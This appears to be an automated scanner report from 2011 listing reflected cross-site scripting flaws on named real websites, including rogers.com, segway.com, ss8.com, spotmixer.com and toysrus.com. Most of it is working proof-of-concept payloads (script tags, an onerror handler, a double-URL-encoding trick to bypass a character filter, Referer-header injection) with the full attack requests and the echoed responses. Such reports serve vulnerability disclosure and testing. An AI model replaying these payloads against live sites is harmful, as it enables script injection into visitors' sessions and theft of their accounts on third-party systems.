The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 311fa'><script>alert(1)</script>0f53d7843a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29efa'><script>alert(1)</script>f4dd780797b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2b1'><script>alert(1)</script>32b5bf1b952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a01b8'><script>alert(1)</script>f41bb64167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 581e2'><script>alert(1)</script>47043ee47e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b06f9'><script>alert(1)</script>ee7a096cab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c58b'><script>alert(1)</script>8fcc46ea593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b0c4'><script>alert(1)</script>cf09d0f1d85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 618f0'><script>alert(1)</script>25b56d54147 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2df3'><script>alert(1)</script>1b7cf0cc3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8 was submitted in the REST URL parameter 2. This input was echoed as 71c2a"><img src=a onerror=alert(1)>8605f7417b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /web/content71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8/SHM_Coming_Soon HTTP/1.1 Host: www.rogers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 13 Oct 2011 11:04:23 GMT Server: Apache Set-Cookie: TLTSID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com Set-Cookie: TLTUID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com; Expires=Thu, 13-10-2021 11:04:23 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html> <head> <title>This page cannot be found - 404 Error</title> <SCRIPT LANGUA ...[SNIP]... <a href="/web/content71c2a"><img src=a onerror=alert(1)>8605f7417b8/SHM_Coming_Soon;jsessionid=hCS3TWFXn8GYhZtpXtGGy2fGlh7xppj4VQxzz8jh1Vy3x49zs42B!506780405?_nfpb=true&_pageLabel=Home&_nfls=true&setLanguage=fr"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6d53"%3b4fb4a7d75e9 was submitted in the REST URL parameter 3. This input was echoed as f6d53";4fb4a7d75e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/content/SHM_Coming_Soonf6d53"%3b4fb4a7d75e9 HTTP/1.1 Host: www.rogers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.13. https://www.rogers.com/web/content/SHM_Coming_Soon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.rogers.com
Path:
/web/content/SHM_Coming_Soon
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f63c1"-alert(1)-"40d7d326a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/content/SHM_Coming_Soon?f63c1"-alert(1)-"40d7d326a0=1 HTTP/1.1 Host: www.rogers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.14. http://www.rpxcorp.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.rpxcorp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a11"><a>492cb211934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?83a11"><a>492cb211934=1 HTTP/1.1 Host: www.rpxcorp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 13 Oct 2011 11:03:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=12986745;path=/ Set-Cookie: CFTOKEN=12340961;path=/ Set-Cookie: DEBUG=0;path=/ Set-Cookie: USERID=;path=/ Set-Cookie: USERNAME=;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="/index.cfm?83a11"><a>492cb211934=1&fontsize=1" class="on"> ...[SNIP]...
1.15. http://www.segway.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.segway.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e1c"-alert(1)-"a4d5bfe43e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?41e1c"-alert(1)-"a4d5bfe43e2=1 HTTP/1.1 Host: www.segway.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:03:44 GMT Server: Apache X-Powered-By: PHP/5.2.17 Set-Cookie: safety_popup_counter=1; expires=Sun, 07-Oct-2012 11:03:44 GMT Connection: close Content-Type: text/html Content-Length: 19921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <script type="text/javascript">a2a_linkname="Segway Home Page";a2a_linkurl="www.segway.com/?41e1c"-alert(1)-"a4d5bfe43e2=1";</script> ...[SNIP]...
1.16. http://www.silverspringnet.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.silverspringnet.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67e9"><script>alert(1)</script>16b9b2438e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/d67e9"><script>alert(1)</script>16b9b2438e2 HTTP/1.1 Host: www.silverspringnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 6068 Connection: close Content-Type: text/html; charset=windows-1252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which contai ...[SNIP]... <form method="get" action="/search.php/d67e9"><script>alert(1)</script>16b9b2438e2" class="zoom_searchform"> ...[SNIP]...
1.17. http://www.spotmixer.com/create_video/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.spotmixer.com
Path:
/create_video/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b616d"><script>alert(1)</script>5705d444d5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1 HTTP/1.1 Host: www.spotmixer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26 Cache-Control: no-cache Set-Cookie: JSESSIONID=22F99E6D8A5AFAF6F7F431021E382FC3; Path=/create_video Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 10403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio ...[SNIP]... <form id="form_login" name="login_form" method="post" action="https://www.spotmixer.com/create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1"> ...[SNIP]...
1.18. http://www.spotmixer.com/create_video/register [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.spotmixer.com
Path:
/create_video/register
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34282"><script>alert(1)</script>365ee9000a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /create_video/register?34282"><script>alert(1)</script>365ee9000a8=1 HTTP/1.1 Host: www.spotmixer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26 Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 17375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio ...[SNIP]... <form name="register_form" method="post" action="https://www.spotmixer.com/create_video/register?34282"><script>alert(1)</script>365ee9000a8=1"> ...[SNIP]...
1.19. http://www.ss8.com/login-lost-password.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ss8.com
Path:
/login-lost-password.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa6e"><script>alert(1)</script>fee3537570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login-lost-password.php/3fa6e"><script>alert(1)</script>fee3537570 HTTP/1.1 Host: www.ss8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:45 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 4664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
1.20. http://www.ss8.com/login.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ss8.com
Path:
/login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c376b"><script>alert(1)</script>4a485a12cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login.php/c376b"><script>alert(1)</script>4a485a12cae HTTP/1.1 Host: www.ss8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:39 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 4822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
1.21. http://www.ss8.com/user-registration.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ss8.com
Path:
/user-registration.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 206fa"><script>alert(1)</script>547dfd0c1c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /user-registration.php/206fa"><script>alert(1)</script>547dfd0c1c1 HTTP/1.1 Host: www.ss8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:39 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 5727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
The value of the kword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973 was submitted in the kword parameter. This input was echoed as b652f"><script>alert(1)</script>6c17649a973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the kword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ventureloop/job_search.php?g=0&kword=gmz+energyb652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973&jcat=%&jt=1&jc=1&jd=1&fb=1&srchid=0%7C1305743729&btn=1&pagid=0 HTTP/1.1 Host: www.ventureloop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:03:24 GMT Server: Apache Set-Cookie: PHPSESSID=1tmnpvt7n7ef8knna1rv1nhjr4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa254<script>alert(1)</script>c1576a2b5bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /basefa254<script>alert(1)</script>c1576a2b5bf/login.phpx HTTP/1.1 Host: www.veracyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b11b2<script>alert(1)</script>c77da55e264 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/login.phpxb11b2<script>alert(1)</script>c77da55e264 HTTP/1.1 Host: www.veracyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Bad file./home/veracyte/public_html/base/login.phpxb11b2<script>alert(1)</script>c77da55e264
1.25. http://www.whatstyle.net/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.whatstyle.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee403"><script>alert(1)</script>fad55204c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ee403"><script>alert(1)</script>fad55204c76=1 HTTP/1.1 Host: www.whatstyle.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Home | whatstyle.net</title> <meta http-equiv="Content-Type" content="tex ...[SNIP]... <a lang="nl" hreflang="nl" href="http://www.whatstyle.net/nl.index.php?ee403"><script>alert(1)</script>fad55204c76=1" title="Bekijk deze pagina in het Nederlands"> ...[SNIP]...
1.26. http://x3show.mevio.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://x3show.mevio.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59636</script><script>alert(1)</script>210e0a57c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?59636</script><script>alert(1)</script>210e0a57c69=1 HTTP/1.1 Host: x3show.mevio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:meebo="http://www.meebo.com"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39032"><script>alert(1)</script>405e9d78bc0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.sportsauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=39032"><script>alert(1)</script>405e9d78bc0
Response (redirected)
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html; charset=ISO-8859-1 Date: Thu, 13 Oct 2011 11:04:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=PyhWTWFHJML0k2Tp9pLd2lVJG2lphzVnYk2QntHCCQJ7Q110221T!-617247002; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/ Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Content-Length: 132143
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117fe"><script>alert(1)</script>c0d2c0471b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /create_video/customer_service HTTP/1.1 Host: www.spotmixer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5
Response
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:04:35 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26 Set-Cookie: JSESSIONID=A32D46864152B68684F5C20FB4B7E30D; Path=/create_video Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh ...[SNIP]... <input type="hidden" name="return_url" value="http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd36c"><script>alert(1)</script>2d1a52ce099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.toysrus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: dd36c"><script>alert(1)</script>2d1a52ce099
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 13 Oct 2011 11:02:39 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=8QVvTWFPpBBbzpCxbqtwmy4JzBQTMhfcjzs79T8nHpVgpCJdm4mb!1626367435; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/ Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 94916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.30. http://www.ss8.com/account.php [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ss8.com
Path:
/account.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfc28"><script>alert(1)</script>3a7ddddcd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /account.php/bfc28"><script>alert(1)</script>3a7ddddcd4 HTTP/1.1 Host: www.ss8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
